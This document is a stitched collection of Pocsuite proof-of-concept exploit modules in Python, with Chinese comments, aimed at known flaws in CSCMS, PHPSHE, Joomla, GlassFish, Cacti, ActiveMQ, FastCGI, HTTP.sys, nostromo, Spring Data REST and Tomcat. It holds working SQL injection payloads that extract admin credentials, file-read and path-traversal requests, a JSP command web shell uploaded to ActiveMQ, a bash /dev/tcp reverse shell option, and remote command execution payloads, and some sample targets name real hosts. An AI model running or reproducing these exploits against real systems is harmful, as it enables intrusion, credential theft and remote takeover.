        return self.parse_output(result)

    _attack = _verify

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)



#!/usr/bin/env python
# coding: utf-8
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
import urlparse
import re

class TestPOC(POCBase):
    vulID = ''  # ssvid
    version = '1.0'
    author = ['Gump']
    vulDate = '2015-08-11'
    createDate = '2016-01-15'
    updateDate = '2016-01-15'
    references = ['http://www.wooyun.org/bugs/wooyun-2015-0113520']
    name = 'CSCMS V4.0.1 app/controllers/api/count.php SQL注入 POC'
    appPowerLink = 'http://www.chshcms.com/'
    appName = 'CSCMS'
    appVersion = '4.0.1'
    vulType = 'SQL Injection'
    desc = '''
    CSCMS在拼接sql语句的时候过滤不严，把param参数直接拼接到sql语句中导致sql注入，可以获得管理员账户和加密后的密码
    '''
    
    # 组件安装包下载地址：https://github.com/chshcms/CSCMS-v4.0-UTF8
    samples = ['']

    def _attack(self):
        result = {}
        payload = "?param=admin|(select/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(select/**/concat(char(45,45),adminname,char(45,45,45),adminpass,char(45,45))/**/from/**/v4_admin/**/limit/**/1))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)"
        vulurl = urlparse.urljoin(self.url,'index.php/api/count/index' + payload)
        head = {
            'Referer':'http://www.baidu.com'
        }
        resp = req.get(vulurl,headers=head)
        # 返回的是500状态码而不是一般的200
        if resp.status_code == 500:
            match_result = re.search(r'Duplicate entry \'1--(.+)---(.+)--\' for key',resp.content,re.I | re.M)
            if match_result:
                result['AdminInfo'] = {}
                result['AdminInfo']['Username'] = match_result.group(1)
                result['AdminInfo']['Password'] = match_result.group(2)
        return self.parse_output(result)

    def _verify(self):
        result = {}
        payload = "?param=admin|(select/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),md5(1))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)"
        vulurl = urlparse.urljoin(self.url,'index.php/api/count/index' + payload)
        head = {
            'Referer':'http://www.baidu.com'
        }
        resp = req.get(vulurl,headers=head)
        # 返回的是500状态码而不是一般的200
        if resp.status_code == 500 and 'c4ca4238a0b923820dcc509a6f75849b' in resp.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = urlparse.urljoin(self.url,'index.php/api/count/index')
            result['VerifyInfo']['Payload'] = payload
        return self.parse_output(result)

    def parse_output(self, result):
        #parse output
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)


#!/usr/bin/env python
# coding: utf-8

import re

from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register


class TestPOC(POCBase):
    vulID = '90437'
    version = '1'
    author = 'RickGray'
    vulDate = '2016-01-14'
    createDate = '2016-01-14'
    updateDate = '2016-01-14'
    references = [
        'https://www.sebug.net/vuldb/ssvid-90437',
        'http://www.oracle.com/us/products/middleware/cloud-app-foundation/glassfish-server/overview/index.html',
        'https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904'
    ]
    name = 'GlassFish <= 4.1.0 任意文件读取漏洞 POC'
    appPowerLink = 'https://glassfish.java.net'
    appName = 'GlassFish'
    appVersion = '<= 4.1.0'
    vulType = 'Arbitrary File Read'
    desc = '''

    '''

    samples = []

    def _verify(self):
        v_url = '/theme/META-INF/%c0%ae%c0%ae/META-INF/MANIFEST.MF'
        response = req.get(self.url + v_url)
    
        return self.parse_verify(response)

    def _attack(self):
        return self._verify()

    def parse_verify(self, response):
        output = Output(self)
        result = {}
        
        if re.search(r'Manifest-Version|Mainfest.*Versioin', response.content):
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = response.url
            output.success(result)
        else:
            output.fail('Failed to read file or not be vulnerable')

        return output


register(TestPOC)



#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
class TestPOC(POCBase):
    vulID   ='123'
    version = '1'
    author = '小雨'
    vulDate = '2018-05-07'
    name = '文件包含'
    appPowerLink = 'http://192.168.90.177/wordpress/'
    appName = '无'
    appVersion = '0'
    vulType = ' XSS '
    desc = '''
    https://www.exploit-db.com/exploits/44340/
    '''
    
    def _attack(self):
        return self._verify()
    
    def _verify(self):
        payload = "/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=C:\Windows\System32\drivers\etc\hosts"
        res = req.get(self.url.rstrip('/') + payload)
        return self.parse_verify(res)
    
    def parse_verify(self, res):
        output = Output(self)
        result = {}
        if "HOSTS" in res.content and "DNS" in res.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = res.url
            output.success(result)
        else:
            output.fail('No vulnerability found.')
        return output
register(TestPOC)


#!/usr/bin/env python
# -*- coding: utf-8 -*-

from pocsuite.api.request import req
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase


class TestPOC(POCBase):
    vulID = '00001'
    version = '1'
    author = 'jeffzhang'
    vulDate = '2017-08-12'
    createDate = '2017-08-12'
    updateDate = '2017-08-12'
    references = ['http://www.wooyun.org/bugs/wooyun-2010-0179762']
    name = 'Cacti WeatherMap插件漏洞 PoC'
    appPowerLink = 'https://www.cacti.com'
    appName = 'Cacti'
    appVersion = 'All'
    vulType = 'File Upload'
    desc = '''
            Cacti 的 weathermap 插件，可写入任意文件
    '''
    samples = ['http://202.29.104.34']

    def _verify(self):
        result = {}
        payload = '/plugins/weathermap/editor.php?plug=0&mapname=test.php&action=set_map_properties&param=&param2=&debug=existing&node_name=\
        &node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=\
        &link_target=&link_width=&link_infourl=&link_hover=&map_title=46ea1712d4b13b55b3f680cc5b8b54e8&map_legend=Traffic+Load&map_stamp=\
        Created:+%b+%d+%Y+%H:%M:%S&map_linkdefaultwidth=7'
        vulurl = self.url + payload
        verurl = self.url + '/plugins/weathermap/configs/test.php'
        req.get(vulurl)
        req_ver = req.get(verurl)
        if req_ver.status_code == 200 and '46ea1712d4b13b55b3f680cc5b8b54e8' in req_ver.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
            result['VerifyInfo']['Payload'] = payload
        return self.parse_attack(result)

    def _attack(self):
        return self._verify()

    def parse_attack(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet noting return')
        return output


register(TestPOC)



#!/usr/bin/env python
# -*- coding: utf-8 -*-

"""
Copyright (c) 2014-2015 pocsuite developers (http://seebug.org)
See the file 'docs/COPYING' for copying permission
"""

from pocsuite.api.request import req 
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase

class ActiveMQPOC(POCBase):
    vulID = '32'  # ssvid ID 如果是提交漏洞的同时提交 PoC,则写成 0
    version = '1' #默认为1
    vulDate = '2018-06-05' #漏洞公开的时间,不知道就写今天

    author = 'arr0w1' #  PoC作者的大名
    createDate = '2018-06-05'# 编写 PoC 的日期
    updateDate = '2018-06-05'# PoC 更新的时间,默认和编写时间一样
    references = 'https://help.aliyun.com/knowledge_detail/50436.html'# 漏洞地址来源,0day不用写
    name = 'ActiveMQ Unauthorized access'# PoC 名称
    appPowerLink = ''# 漏洞厂商主页地址
    appName = 'ActiveMQ'# 漏洞应用名称
    appVersion = 'all versions'# 漏洞影响版本
    vulType = 'Command Execution'#漏洞类型,类型参考见 漏洞类型规范表
    desc = '''
        ActiveMQ 未授权访问漏洞
    ''' # 漏洞简要描述
    samples = []# 测试样列,就是用 PoC 测试成功的网站
    install_requires = [] # PoC 第三方模块依赖，请尽量不要使用第三方模块，必要时请参考《PoC第三方模块依赖说明》填写
    cvss = u"严重" #严重,高危,中危,低危

    #验证漏洞 pocsuite -r 32-ActiveMQ-unauthorized-access.py -u 127.0.0.1 --verify
    def _verify(self):
        #定义返回结果
        return self._attack()

    #漏洞攻击
    def _attack(self):
         #定义返回结果
        result = {}
        #获取漏洞url
        vul_url = '%s' % self.url
        #如果设置端口则取端口,没有设置则为默认端口
        import re
        from pocsuite.lib.utils.funs import url2ip
        _port = re.findall(':(\d+)\s*', vul_url)
        if len(_port) != 0:
            _host = url2ip(vul_url)[0]
            _port = url2ip(vul_url)[1]
        else :
            _host = url2ip(vul_url)
            _port = '8161'


       
        #检测漏洞
        url = 'http://%s:%s'%(_host,_port)
        # print url
        try:
            get_fileserver_path_url = url + '/fileserver/%08/..%08/.%08/%08'
            res = req.put(url=get_fileserver_path_url, timeout=5, allow_redirects=False)
            # print res.reason
            path = re.findall(r'/.*?(?=fileserver/.*)', res.reason)[0]
            # print path
            put_jsp_url = url + '/fileserver/haha.jsp'
            jsp_data = '''
                        <%
                if("sec".equals(request.getParameter("pwd"))){
                    java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
                    int a = -1;
                    byte[] b = new byte[2048];
                    out.print("<pre>");
                    while((a=in.read(b))!=-1){
                        out.println(new String(b));
                    }
                    out.print("</pre>");
                }
            %>
            '''
            res = req.put(url=put_jsp_url, timeout=5, allow_redirects=False, data = jsp_data)
            if res.status_code == 204:
                # print 'ok'
                headers = {
                    'Destination': 'file://'+path+'admin/haha.jsp'
                }
                res = req.request('move', url=put_jsp_url, timeout=5, allow_redirects=False, headers=headers)
                if res.status_code == 204:
                    # print 'ok'
                    exploit_url = url + '/admin/haha.jsp?pwd=sec&i=id'
                    res = req.get(url=exploit_url, timeout=5, allow_redirects=False)
                    if 'uid' in res.text:
                        id_info = re.findall(r'(?<=<pre>).*', res.text)[0]
                        result['VerifyInfo'] = {}
                        result['VerifyInfo']['URL'] = self.url
                        result['VerifyInfo']['Payload'] = exploit_url
                    
        except Exception as e:
            print(str(e))
        return self.save_output(result)

    def save_output(self, result):
        #判断有无结果并输出
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail()
        return output

register(ActiveMQPOC)



#!/usr/bin/env python
# -*- coding: utf-8 -*-

"""
Copyright (c) 2014-2015 pocsuite developers (http://seebug.org)
See the file 'docs/COPYING' for copying permission
"""
#命令行

#requests 
from pocsuite.api.request import req
#register
from pocsuite.api.poc import register
#report
from pocsuite.api.poc import Output, POCBase
#url转换host
from pocsuite.lib.utils.funs import url2ip



#基础基类
#fastcgi
class fastcgiPOC(POCBase):
    vulID = '39'  # ssvid ID 如果是提交漏洞的同时提交 PoC,则写成 0
    version = '1' #默认为1
    vulDate = '2018-07-9' #漏洞公开的时间,不知道就写今天

    author = 'arr0w1' #  PoC作者的大名
    createDate ='2018-07-9'# 编写 PoC 的日期
    updateDate = '2018-07-9'# PoC 更新的时间,默认和编写时间一样
    references = ['']# 漏洞地址来源,0day不用写
    name = 'fastcgi read file vulnerability'# PoC 名称
    appPowerLink = 'http://fastcgi.com/'# 漏洞厂商主页地址
    appName = 'fastcgi'# 漏洞应用名称
    appVersion = 'all versions'# 漏洞影响版本
    vulType = 'cmd-exec'#漏洞类型,类型参考见 漏洞类型规范表
    desc = '''
    fastcgi read file vulnerability，fastcgi  尝试读文件，该漏洞可执行命令
    ''' # 漏洞简要描述
    samples = []# 测试样列,就是用 PoC 测试成功的网站
    install_requires = ['socket'] # PoC 第三方模块依赖，请尽量不要使用第三方模块，必要时请参考《PoC第三方模块依赖说明》填写
    cvss = u"严重" #严重,高危,中危,低危

    #指纹方法
    def _fingerprint(self):
        pass


    def _verify(self):
        ip = self.url.split(':')[1].replace('/', '')
        import socket
        #import psycopg2
        #调用指纹方法
        result={}

        output = Output(self)
        message = ''

        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM);
        sock.settimeout(5.0)
        sock.connect((ip, 9000))
        data = """
        01 01 00 01 00 08 00 00  00 01 00 00 00 00 00 00
        01 04 00 01 00 8f 01 00  0e 03 52 45 51 55 45 53 
        54 5f 4d 45 54 48 4f 44  47 45 54 0f 08 53 45 52 
        56 45 52 5f 50 52 4f 54  4f 43 4f 4c 48 54 54 50 
        2f 31 2e 31 0d 01 44 4f  43 55 4d 45 4e 54 5f 52
        4f 4f 54 2f 0b 09 52 45  4d 4f 54 45 5f 41 44 44
        52 31 32 37 2e 30 2e 30  2e 31 0f 0b 53 43 52 49 
        50 54 5f 46 49 4c 45 4e  41 4d 45 2f 65 74 63 2f 
        70 61 73 73 77 64 0f 10  53 45 52 56 45 52 5f 53
        4f 46 54 57 41 52 45 67  6f 20 2f 20 66 63 67 69
        63 6c 69 65 6e 74 20 00  01 04 00 01 00 00 00 00
        """

        data_s = ''
        for _ in data.split():
            data_s += chr(int(_, 16))
        sock.send(data_s)
        try:
            ret_data = sock.recv(1024)
            if ret_data.find(':root:') > 0:

                message = ip + 'fastcgi read file vul'
                result['VerifyInfo'] = {}


                result['VerifyInfo']['url'] = ip
                result['VerifyInfo']['Payload'] = message


                return True
            else:
                return False

        except Exception as e:
            pass

        sock.close()

        return self.save_output(result)


    #攻击模块
    def _attack(self):
        pass

    #输出报告
    def save_output(self, result):
        #判断有无结果并输出
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail()
        return output


#注册类
register(fastcgiPOC)


#!/usr/bin/env python
# -*- coding: utf-8 -*-

"""
Copyright (c) 2014-2015 pocsuite developers (http://seebug.org)
See the file 'docs/COPYING' for copying permission
"""

#requests
from pocsuite.api.request import req
#register
from pocsuite.api.poc import register
#report
from pocsuite.api.poc import Output, POCBase
#url转换host
from pocsuite.lib.utils.funs import url2ip



#基础基类
#fastcgi
class MSPOC(POCBase):
    vulID = '54'  # ssvid ID 如果是提交漏洞的同时提交 PoC,则写成 0
    version = '1' #默认为1
    vulDate = '2018-09-18' #漏洞公开的时间,不知道就写今天

    author = 'arr0w1' #  PoC作者的大名
    createDate ='2018-09-18'# 编写 PoC 的日期
    updateDate = '2018-09-18'# PoC 更新的时间,默认和编写时间一样
    references = ['']# 漏洞地址来源,0day不用写
    name = 'HTTP.sys RCE(only DOS) CVE-2015-1635'# PoC 名称
    appPowerLink = 'https://www.microsoft.com/'# 漏洞厂商主页地址
    appName = 'Microsoft'# 漏洞应用名称
    appVersion = 'all versions'# 漏洞影响版本
    vulType = 'cmd-exec'#漏洞类型,类型参考见 漏洞类型规范表
    desc = '''
    MS15-034 HTTP.sys 远程代码执行（CVE-2015-1635）目前仅能作为DOS攻击
    ''' # 漏洞简要描述
    samples = []# 测试样列,就是用 PoC 测试成功的网站
    install_requires = ['socket'] # PoC 第三方模块依赖，请尽量不要使用第三方模块，必要时请参考《PoC第三方模块依赖说明》填写
    cvss = u"严重" #严重,高危,中危,低危

    #指纹方法
    def _fingerprint(self):
        pass


    @property
    def _verify(self):
        result = {}
        output = Output(self)

        # ip
        ip = url2ip(self.url)

        #port
        import re
        _port = re.findall(':(\d+)\s*', self.url)
        if len(_port) != 0:
            _port = url2ip(self.url)[1]
        else:
            _port = 80


        import socket

        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(2.0)
        sock.connect((ip,int(_port)))  # ip port
        flag = "GET / HTTP/1.0\r\nHost: stuff\r\nRange: bytes=0-18446744073709551615\r\n\r\n"
        sock.send(flag)
        try:
            data = sock.recv(1024)
            if 'Requested Range Not Satisfiable' in data and 'Server: Microsoft' in data:
                result['VerifyInfo'] = {}

                result['VerifyInfo']['url'] = ip
                result['VerifyInfo']['Payload'] = ip + 'fastcgi read file vul'

                return self.save_output(result)

        except:
            pass

        sock.close()
        # print '-' * 18 + '\n'
        # print '-' * 18 + '\n'



    #攻击模块
    def _attack(self):
        pass

    #输出报告
    def save_output(self, result):
        #判断有无结果并输出
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail()
        return output


#注册类
register(MSPOC)


"""
If you have issues about development, please read:
https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md
for more about information, plz visit http://pocsuite.org
"""

import base64
from collections import OrderedDict

from pocsuite3.api import Output
from pocsuite3.api import POCBase
from pocsuite3.api import OptDict
# from pocsuite3.api import logger
from pocsuite3.api import requests
from pocsuite3.api import OptString
from pocsuite3.api import register_poc
from pocsuite3.api import POC_CATEGORY
from pocsuite3.api import REVERSE_PAYLOAD
from pocsuite3.api import get_listener_ip
from pocsuite3.api import get_listener_port


class DemoPOC(POCBase):
	vulID = '97160'  # ssvid
	version = '1.0'
	author = ['Knownsec']
	vulDate = '2018-03-07'
	createDate = '2018-03-07'
	updateDate = '2018-03-07'
	references = ['https://www.seebug.org/vuldb/ssvid-97160']
	name = 'Spring Data Rest 远程命令执行漏洞'
	appPowerLink = 'https://spring.io/projects/spring-data-rest'
	appName = 'Spring Data REST'
	appVersion = '''
				Spring Data REST versions 2.5.12, 2.6.7, 3.0 RC3之前的版本、
				Spring Boot versions 2.0.0M4 之前的版本、
				Spring Data release trains Kay-RC3 之前的版本
				'''
	vulType = 'code-exec'
	desc = '''
		Spring Data REST是一个构建在Spring Data之上，为了帮助开发者更加容易地
		开发REST风格的Web服务。在REST API的Patch方法中（实现RFC6902），path的
		值被传入setValue，导致执行了SpEL表达式，触发远程命令执行漏洞。
	'''
	samples = ['http://10.10.50.91:8092']
	install_requires = []
	category = POC_CATEGORY.EXPLOITS.WEBAPP

	def _options(self):
		o = OrderedDict()
		o["cmd"] = OptString('touch /tmp/success', description='需要用户输入执行的命令', require=True)
		payload = {
			"nc": REVERSE_PAYLOAD.NC,
			"bash": """bash -i >& /dev/tcp/{0}/{1} 0>&1""",
			"java": REVERSE_PAYLOAD.JAVA,
		}
		o["command"] = OptDict(selected="bash", default=payload)
		
		return o

	def _verify(self):
		result = {}
		get_headers = url_headers()
		playload = get_data(self.get_option("cmd"))
		# /customers/1
		p = requests.patch(url=self.url, headers=get_headers, json=playload)
		if 'EL1010E: Property or field \'lastname\' cannot be set on object of type \'java.lang.UNIXProcess\'' in p.text:
			result['VerifyInfo'] = {}
			result['VerifyInfo']['url'] = self.url
			result['VerifyInfo']['playload'] = playload

		return self.parse_output(result)

	def _attack(self):
		return self._verify()

	def _shell(self):
		result = {}
		get_headers = url_headers()
		playload = shell_data(self.get_option("command"))
		# /customers/1
		p = requests.patch(self.url, headers=get_headers, json=playload)
		if 'EL1010E: Property or field \'lastname\' cannot be set on object of type \'java.lang.UNIXProcess\'' in p.text:
			result['VerifyInfo'] = {}
			result['VerifyInfo']['url'] = self.url
			result['VerifyInfo']['playload'] = playload
		
		return self.parse_output(result)

	def parse_output(self, result):
		output = Output(self)
		if result:
			output.success(result)
		else:
			output.fail('target is not vulnerable')
		return output

def url_headers():
	headers = {
		'Accept-Language': 'en',
		'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0',
		'Accept': '*/*',
		'Accept-Encoding': 'gzip, deflate',
		'Content-Type': 'application/json-patch+json',
		'Connection': 'close'
	}
	
	return headers

def get_data(commond):
	msg = char_to_ord(commond)
	tmp = "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{%s}))/lastname" % msg
	data = [{ "op": "replace", "path":tmp , "value": "vulhub" }]
	
	return data

def char_to_ord(commond):
	msg = ''
	for i in commond:
		msg = msg + str(ord(i)) + ','
	msg = msg.rstrip(',')

	return msg

def shell_data(commond):
	data = 'bash -c {echo,'
	data += str(base64.b64encode(commond.encode('utf-8')),'utf-8')
	data += '}|{base64,-d}|{bash,-i}'

	msg = char_to_ord(data)
	tmp = "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{%s}))/lastname" % msg
	data = [{ "op": "replace", "path":tmp , "value": "vulhub" }]
	
	return data

register_poc(DemoPOC)


#!/usr/bin/env python
# coding: utf-8
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase
from urlparse import urlparse, urljoin
from pocsuite.api.request import req
import socket
import random
class TestPOC(POCBase):
    vulID = 'N/A'
    version = '1.0'
    author = 'co0ontty'
    vulDate = '2019-10-18'
    createDate = '2019-10-18'
    updateDate = '2019-10-18'
    references = ['']
    name = 'nostromo 远程命令执行漏洞'
    appPowerLink = ''
    appName = 'nostromo'
    appVersion = ''
    vulType = '命令执行'
    desc = '''
    '''
    samples = ['']
    install_requires = ['']


    def _verify(self):
        def recv(s):
            r=''
            try:
                while True:
                    t=s.recv(1024)
                    if len(t)==0:
                        break
                    r+=t
            except:
                pass
            return r
        def exploit(host,port,cmd):
            s=socket.socket()
            s.settimeout(1)
            s.connect((host,int(port)))
            payload="""POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0\r\nContent-Length: 1\r\n\r\necho\necho\n{} 2>&1""".format(cmd)
            s.send(payload)
            r=recv(s)
            r=r[r.index('\r\n\r\n')+4:]
            return r
        result = {}
        random_int_1 = random.randint(1,1000)
        random_int_2 = random.randint(1,1000)
        cmd = "expr {} + {}".format(random_int_1,random_int_2)
        host = urlparse(self.url).hostname
        port = urlparse(self.url).port
        try:
            resp_text = exploit(host,port,cmd)
            if str(random_int_1+random_int_2) in resp_text:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = self.url
        except :
            pass
        
        return self.parse_output(result)

    _attack = _verify

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)



#!/usr/bin/env python
# coding:utf-8

from pocsuite.api.poc import Output, POCBase
from pocsuite.api.poc import register
from pocsuite.api.request import req
from pocsuite.lib.core.data import logger
from pocsuite.lib.core.enums import CUSTOM_LOGGING
import urlparse
import re

class TestPOC(POCBase):
    vulID = ''  # ssvid
    version = '1.0'
    author = ['Gump']
    vulDate = ''
    createDate = '2016-01-24'
    updateDate = '2016-01-24'
    references = ['http://www.wooyun.org/bugs/wooyun-2015-0141457']
    name = 'PHPSHE 1.4 /www/module/user/order.php SQL注入 POC'
    appPowerLink = 'http://www.phpshe.com/'
    appName = 'PHPSHE'
    appVersion = '1.4'
    vulType = 'SQL injection'
    desc = '''
    PHPSHE 1.4 在/www/module/user/order.php中对参数过滤不严导致SQL注入
    '''

    def check_argv(self):
        logger.log(CUSTOM_LOGGING.WARNING,u"注意，需要登录后的cookie")
        if self.headers['Cookie']:
            logger.log(CUSTOM_LOGGING.WARNING,u"请确保cookie正确")
            return True
        else:
            logger.log(CUSTOM_LOGGING.WARNING,u"请提交登录后的cookie")
            return False

    def _attack(self):
        if self.check_argv():
            result = {}
            payload = "?mod=order&state=11111111%27%20UNION%20SELECT%20(select%20concat(char(45,45,45),admin_name,char(45,45,45),admin_pw,char(45,45,45))%20from%20pe_admin%20limit%201),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28%23"
            vulurl = urlparse.urljoin(self.url,'user.php' + payload)
            resp = req.get(vulurl)
            if resp.status_code == 200:
                match_result = re.search(r'---(.+)---(.+)---',resp.content,re.I | re.M)
                if match_result:
                    result['AdminInfo'] = {}
                    result['AdminInfo']['Username'] = match_result.group(1)
                    result['AdminInfo']['Password'] = match_result.group(2)
            return self.parse_attack(result)

    def _verify(self):
        if self.check_argv():
            result = {}
            payload = "?mod=order&state=11111111%27%20UNION%20SELECT%20(select%20concat(floor(rand(0)*2),md5(1))%20from%20pe_admin%20limit%201),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28%23"
            vulurl = urlparse.urljoin(self.url,'user.php' + payload)
            resp = req.get(vulurl)
            if resp.status_code == 200 and 'c4ca4238a0b923820dcc509a6f75849b' in resp.content:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = urlparse.urljoin(self.url,'user.php')
                result['VerifyInfo']['Payload'] = payload
            return self.parse_attack(result)

    def parse_attack(self,result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Nothon returned')
        return output

register(TestPOC)



#!/usr/bin/env python
# coding: utf-8
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
import re

class TestPOC(POCBase):
    vulID = '72200'  # ssvid
    version = '1.0'
    author = ['kikay']
    vulDate = '2011-11-29'
    createDate = '2016-01-10'
    updateDate = '2016-01-10'
    references = ['http://www.sebug.net/vuldb/ssvid-72200']
    name = 'Joomla Component Time Returns (com_timereturns) 2.0 - SQL Injection'
    appPowerLink = 'http://www.joomla.com'
    appName = 'Joomla Time Returns Component'
    appVersion = '2.0'
    vulType = 'SQL Injection'
    desc = '''
        Joomla!的Time Returns（com_timereturns）组件2.0版本中存在SQL注入漏洞。
        主要是对参数id过滤不严格造成的，远程攻击者可借助id参数执行任意SQL命令。
    '''
    samples = ['http://www.110xo.com/page/service']

    def _attack(self):
        #利用floor回显报错的方式，读取数据库信息
        result = {}
        payload="1' AND (SELECT 1222 FROM(SELECT COUNT(*),"\
        "CONCAT(0x247e7e7e24,user(),0x2a2a2a,version(),0x247e7e7e24,"\
        "FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'YLvB'='YLvB"
        exploit="/index.php?option=com_timereturns&view=timereturns&id="
        #提取信息的正则表达式
        pars="\$~~~\$([_a-zA-Z0-9].*)\*\*\*(.*)\$~~~\$"
        #构造访问地址
        vulurl=self.url+exploit+payload
        #自定义的HTTP
        httphead = {
          'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
          'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
          'Connection':'keep-alive'
        }
        #尝试访问
        resp=req.get(url=vulurl,headers=httphead,timeout=50)
        #检查
        if 'Duplicate entry' in resp.content:
            #尝试提取信息
            match=re.search(pars,resp.content,re.I|re.M)
            if match:
                #记录数据库信息
                result['DatabaseInfo']={}
                #数据库用户名
                result['DatabaseInfo']['Username']=match.group(1)
                #数据库版本
                result['DatabaseInfo']['Version']=match.group(2)
        return self.parse_output(result)

    def _verify(self):
        #利用注入漏洞计算md5(1)
        result = {}
        #利用的payload(利用的是floor回显报错的方式)
        payload="1' AND (SELECT 1222 FROM(SELECT COUNT(*),CONCAT(md5(1),"\
        "FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'YLvB'='YLvB"
        #漏洞页面
        exploit='/index.php?option=com_timereturns&view=timereturns&id='
        #构造访问地址
        vulurl=self.url+exploit+payload
        #自定义的HTTP
        httphead = {
          'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
          'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
          'Connection':'keep-alive'
        }
        #尝试访问
        resp=req.get(url=vulurl,headers=httphead,timeout=50)
        #检查是否含有特征字符串(md5(1)=c4ca4238a0b923820dcc509a6f75849b)
        if 'c4ca4238a0b923820dcc509a6f75849b' in resp.content:
            #漏洞验证成功
            result['VerifyInfo']={}
            result['VerifyInfo']['URL'] = self.url+exploit
            result['VerifyInfo']['Payload'] = payload
        return self.parse_output(result)

    def parse_output(self, result):
        #parse output
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)


#!/usr/bin/env python3
# -*- coding: utf-8 -*-

import hashlib
from importlib.abc import Loader
from importlib.util import spec_from_file_location, module_from_spec


def get_md5(value):
    if isinstance(value, str):
        value = value.encode(encoding='UTF-8')
    return hashlib.md5(value).hexdigest()


def load_string_to_module(code_string, fullname=None):
    try:
        module_name = 'cvpocs_{0}'.format(get_md5(code_string)) if fullname is None else fullname
        file_path = 'cvpoc://{0}'.format(module_name)
        poc_loader = PocLoader(module_name, file_path)
        poc_loader.set_data(code_string)
        spec = spec_from_file_location(module_name, file_path, loader=poc_loader)
        mod = module_from_spec(spec)
        spec.loader.exec_module(mod)
        return mod

    except ImportError:
        error_msg = "load module '{0}' failed!".format(fullname)
        print(error_msg)
        raise


class PocLoader(Loader):
    def __init__(self, fullname, path):
        self.fullname = fullname
        self.path = path
        self.data = None

    def set_data(self, data):
        self.data = data

    def get_filename(self, fullname):
        return self.path

    def get_data(self, filename):
        if filename.startswith('cvpoc://') and self.data:
            data = self.data
        else:
            with open(filename, encoding='utf-8') as f:
                data = f.read()
        return data

    def exec_module(self, module):
        filename = self.get_filename(self.fullname)
        poc_code = self.get_data(filename)
        obj = compile(poc_code, filename, 'exec', dont_inherit=True, optimize=-1)
        exec(obj, module.__dict__)



#!/usr/bin/env python
# -*- coding: utf-8 -*-

"""
Copyright (c) 2014-2015 pocsuite developers (http://seebug.org)
See the file 'docs/COPYING' for copying permission
"""

#requests 
from pocsuite.api.request import req
#register
from pocsuite.api.poc import register
#report
from pocsuite.api.poc import Output, POCBase
#url转换host
from pocsuite.lib.utils.funs import url2ip



#基础基类
#fastcgi
class TomcatuploadPOC(POCBase):
    vulID = '42'  # ssvid ID 如果是提交漏洞的同时提交 PoC,则写成 0
    version = '1' #默认为1
    vulDate = '2018-07-24' #漏洞公开的时间,不知道就写今天

    author = 'arr0w1' #  PoC作者的大名
    createDate ='2018-07-24'# 编写 PoC 的日期
    updateDate = '2018-07-24'# PoC 更新的时间,默认和编写时间一样
    references = ['']# 漏洞地址来源,0day不用写
    name = 'Tomcat uploadfile vulnerability'# PoC 名称
    appPowerLink = 'https://nvd.nist.gov/vuln/detail/CVE-2017-12615'# 漏洞厂商主页地址
    appName = 'Tomcat'# 漏洞应用名称
    appVersion = 'all versions'# 漏洞影响版本
    vulType = 'file-upload'#漏洞类型,类型参考见 漏洞类型规范表
    desc = '''
    Tomcat uploadfile vulnerability，CVE-2017-12615
    ''' # 漏洞简要描述
    samples = []# 测试样列,就是用 PoC 测试成功的网站
